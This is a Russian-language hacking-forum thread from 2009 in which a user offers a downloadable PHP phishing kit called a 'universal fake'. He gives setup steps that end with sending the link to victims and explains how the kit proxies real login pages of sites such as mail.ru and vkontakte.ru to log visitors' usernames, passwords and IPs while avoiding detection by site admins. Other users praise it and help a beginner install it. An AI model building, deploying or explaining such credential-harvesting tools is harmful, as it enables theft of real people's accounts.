Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Ponchik's universal fake v1.0 (https://forum.antichat.xyz/showthread.php?t=105983)

Ponchik 12.02.2009 18:21
Ponchik's universal fake v1.0
 
Эммм... Честно говоря вобще не нащёл куда положить это, но кажись в уязвимостях более менее смотриться...
Так вот, предлагаю вам универсальный фейк :)
Ложим его на хостинг с сокетами, пишем в него сайт, проксики для работы и он сам всё сделает, вот..
Придумал такое не я, предложили реализовать идею, я её токо реализовывал :)
Код:
http://dump.ru/file/1532414
http://rapidshare.com/files/197209760/multi_fake.rar.html
http://slil.ru/26637882
Заливаем на хостинг
Выставляем права на файл логов и конфиг
Заходим на скрипт фейка
Заполняем в него инфу
Рассылаем ссыль жертвам
#если нехотите юзать прокси пишите сайт, тоесть если фей для torrents.ru в прокси пишем torrents.ru:80

В отличии от фейка "Anyfake" бузи кодера мой использует прокси и в связи с этим не палится админами сайта по рефереру, т.к. картинки идут через прокси тоже

Как это работает?
Когда юзер заходит на фейк, скрипт проверяет существование файла настроек, если файл пустой или не существует, выводится страница настройки.
После того как всё настроено, скрипт проверяет ввел пользователь и логин и пароль или нет? Если ввел, тогда скрипт записывает время, IP, логин и пароль в файл-лог, который был указан при настройке скрипта и пользователя перекидывает на страницу входа, которая также была указана при настройке.
Если пользователь ничего не ввел, тогда из списка прокси серверов (тоже указанных при настройке скрипта) случайным образом выбирается 1 прокси сервер. Далее скрипт проверяет это запрос пользователя на фейк, или фейка на получение картинок и другого контента, если это пользователь, то скрипт посылает на прокси сервер запрос для получения страницы входа, которая указана в настройках (если прокси "мёртвый" скрипт записывает сообщение об этом в лог-файл) после получения страницы, скрипт обрабатывает её для изменения адресов картинок и форм для перехвата информации введённой пользователем. Также скрипт получает кодировку которая пришла в странице и отдаёт её пользователю, чтобы текст нормально отображался.

Примеры фейков:
torrents.ru
http://pic.ipicture.ru/uploads/09021...h6W8zSI4AZ.jpg

mail.ru
http://pic.ipicture.ru/uploads/09021...KvTHXERsqZ.jpg

vkontakte.ru
http://pic.ipicture.ru/uploads/09021...rkHTZAkUP1.jpg

odnoklassniki.ru
http://pic.ipicture.ru/uploads/09021...i62FR4Sooq.jpg

UPD
Фейк попал в журнал ксакепа :cool:
http://s59.radikal.ru/i164/0903/bb/53aa1dd4744ct.jpg

iddqd 12.02.2009 18:30
энифейк от Бузикодера не так же работает?

.W 12.02.2009 18:30
Красавчег)
Как всегда хорошая работа

Ponchik 12.02.2009 18:32
iddqd, эээээ? Ану покажи

iddqd 12.02.2009 18:35
http://forum.antichat.ru/showthread.php?t=44845
хотя я хз, как оно работатет, не пробовал

Ponchik 12.02.2009 18:39
iddqd, ну вот имаги он напрямую выдаёт, чёто CSS вобще повырезал =\ Ну хз, может у мя чёто нетак...
Ну думайте сами чё юзать

Faxford 12.02.2009 22:44
Почему у меня файил fake.php в опере открывается не как надо?
http://img19.imageshack.us/img19/956...1674ug7.th.jpg

Ponchik 12.02.2009 22:49
Faxford, даж незнаю плакать или смеяться...
тебе PHP нужен

Faxford 12.02.2009 23:07
Цитата:
Сообщение от Ponchik
Faxford, даж незнаю плакать или смеяться...
тебе PHP нужен
Ну я тип понял... а как его сделать? =\

hidden0123 12.02.2009 23:13
Faxford, ты хоть Apache поставь... А то у тебя так ничего не получится :)

Вот самый обычный его комплект (не требует возни в настройках) _http://dodownload.filefront.com/7377938//2622c7b2ee1c92b8c2dde3451f2289f8d547f4be535b0a3233 a812dbb1200e66fecdfd6f6beff8b5


Время: 02:42
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице